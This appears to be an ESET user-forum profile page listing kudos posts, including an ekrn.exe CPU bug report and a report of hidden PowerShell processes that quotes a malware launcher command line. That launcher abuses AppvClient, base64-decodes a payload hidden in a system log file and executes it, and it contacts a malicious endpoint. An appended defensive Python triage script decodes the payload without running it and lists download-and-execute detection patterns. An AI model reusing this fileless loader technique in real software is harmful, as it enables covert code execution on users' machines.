Kevin999

Members
  • Posts: 43
  • Joined
  • Last visited
  • Days Won: 1

Kudos

  1. Upvote
    Kevin999 received kudos from New_Style_xd in ekrn.exe high CPU usage (>=50%) due to Context switches frequently
    This bug reproduced today. It also disappeared after I restarted my computer.
    Apart from ekrn.exe costing >=50% CPU, Edge and IE couldn't open any website (they kept loading forever); because Firefox had been running for some time, it worked well; only IE could start again after exiting. All of these web browsers still had processes left after exiting, and they couldn't be terminated by Task Manager (access denied). Besides, ping worked well.
  2. Upvote
    Kevin999 received kudos from Leonardo in Two strange powershell processes (maybe coinminers?)
    Yesterday, I found some strange internet traffic while I was using Wireshark. Then I used the EIS "network connections" tool and found it was created by powershell (I didn't run any powershell). This issue reproduced today.
    Conhost.exe and powershell.exe were running in the background, but I didn't run either of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday); conhost seemed not to have any network activity. I used Wireshark to capture packets, then used the filter ipv6.addr==2606:4700:3031::ac43:9c07, and found it was using HTTP/1.1 with the CONNECT method. Please note the strange strings in X-User-Agent. By the way, the TLS (TCP 443) and QUIC (UDP 443) connections were created when I used sandboxed Firefox to visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL visiting them !!!); these websites use Cloudflare to protect themselves. I used ESET SysInspector to capture a snapshot. I used nslookup to resolve:
    C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
    DNS request timed out.
        timeout was 2 seconds.
    Server:  UnKnown
    Address:  192.168.1.1
    DNS request timed out.
        timeout was 2 seconds.
    *** Request to UnKnown timed out

    C:\Users\Admin>nslookup api.private-chatting.com
    DNS request timed out.
        timeout was 2 seconds.
    Server:  UnKnown
    Address:  192.168.1.1
    Non-authoritative answer:
    Name:    api.private-chatting.com
    Addresses:  2606:4700:3032::6815:38d6
              2606:4700:3031::ac43:9c07
              104.21.56.214
    Today
      1. I found the command-line parameters of one of the powershell.exe processes via Task Manager (it cost about 10% CPU):
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
      2. I found C:\Windows\logs\system-logs.txt and found these strings:

    Snipped: The code was moved to the attached file to squeeze the post.

    Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";
    It's the same as the URL in the pcapng file.



    Attachments:
      • system-logs.txt
      • Strange traffic_20220424.rar
      • system-logs.rar
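The launcher in the post above reads one line of a text file, base64-decodes it and runs the result as a script block, so the real payload never appears on the command line. The following Python script is an added triage example (it is not code from Kevin999, ESET or the malware): it extracts the staged file path and line index from a command line of that shape, decodes that line without executing it, and flags indicator strings in the decoded text. The command line is trimmed from the one in the post; the log file contents and the decoded script (an $EndPointURL assignment followed by an Invoke-WebRequest) are constructed stand-ins for the snipped attachment, as is the indicator list.

```python
import base64
import re

# Constructed sample: the staging part of the launcher command line quoted in the
# post (the AppvClient/Sync-AppvPublishingServer prefix is omitted here).
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive '
    r'-WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{'
    r'$a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;'
    r'$script_decoded = [System.Text.Encoding]::UTF8.GetString('
    r'[System.Convert]::FromBase64String($a)); '
    r'$script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}'
)

# Constructed stand-in for the staged file: 17033 harmless log lines, then the
# base64 payload at index 17033 (Select -Index is zero-based in PowerShell).
PAYLOAD_SCRIPT = (
    '$EndPointURL = "http://api.private-chatting.com/connect"\n'
    '$r = Invoke-WebRequest -Uri $EndPointURL -UseBasicParsing'
)
PAYLOAD_B64 = base64.b64encode(PAYLOAD_SCRIPT.encode("utf-8")).decode("ascii")
SAMPLE_LOG_LINES = [
    "2022-04-24 10:%02d:00 INFO service heartbeat ok" % (i % 60) for i in range(17033)
] + [PAYLOAD_B64]

# "Get-Content <path> | Select -Index <n>" is the staging pattern from the post.
STAGE_RE = re.compile(
    r"Get-Content\s+(?P<path>\S+)\s*\|\s*Select(?:-Object)?\s+-Index\s+(?P<index>\d+)",
    re.IGNORECASE,
)

# Indicator strings worth flagging in a decoded script (assumed list, not from the post).
SUSPICIOUS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"https?://", r"Invoke-Expression", r"\bIEX\b", r"FromBase64String",
        r"DownloadString", r"Net\.WebClient", r"Invoke-WebRequest", r"EndPointURL",
    )
]


def find_staged_payload(cmdline):
    """Return (path, line_index) if the command line pulls one line of a file as
    its payload, otherwise None."""
    m = STAGE_RE.search(cmdline)
    if not m:
        return None
    return m.group("path"), int(m.group("index"))


def decode_line(line):
    """Base64-decode one line strictly; return UTF-8 text or None if it is not a
    valid base64 text blob (binascii.Error is a ValueError subclass)."""
    stripped = line.strip()
    if not stripped:
        return None
    try:
        raw = base64.b64decode(stripped, validate=True)
        return raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_payload(lines, index):
    """Decode the line the launcher would have run and list matched indicators.
    Returns (decoded_text_or_None, [matched pattern strings])."""
    if index < 0 or index >= len(lines):
        return None, []
    decoded = decode_line(lines[index])
    if decoded is None:
        return None, []
    return decoded, [p.pattern for p in SUSPICIOUS if p.search(decoded)]


def scan_all_lines(lines):
    """Indexes of every line that decodes to text carrying an indicator; useful
    when the index is unknown or the launcher rotates it."""
    return [
        i for i, line in enumerate(lines)
        if (d := decode_line(line)) is not None and any(p.search(d) for p in SUSPICIOUS)
    ]


if __name__ == "__main__":
    staged = find_staged_payload(SAMPLE_CMDLINE)
    print("staged file:", staged)
    text, hits = extract_payload(SAMPLE_LOG_LINES, staged[1])
    print("indicators:", hits)
    print("decoded payload:\n" + text)
    print("all payload lines:", scan_all_lines(SAMPLE_LOG_LINES))
```

On a real system, replace SAMPLE_LOG_LINES with the lines of the file named in the command line (read it as text with errors="replace", since PowerShell's Get-Content tolerates odd bytes) and take the command line from Task Manager, Process Explorer or a Sysmon Event ID 1 record; the decoded script is then safe to read in an editor, and the index and file path are the two values to put into a detection rule for the launcher.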
  3. Upvote
    Kevin999 received kudos from New_Style_xd in ekrn.exe high CPU usage (>=50%) due to Context switches frequently
    This bug reproduced today. It also disappeared after I restarted my computer.
    I'll send the dump to you later.
    P.S. Due to the extremely high CPU usage, I had to run ESET Log Collector after restarting my computer, but the log was created before the restart.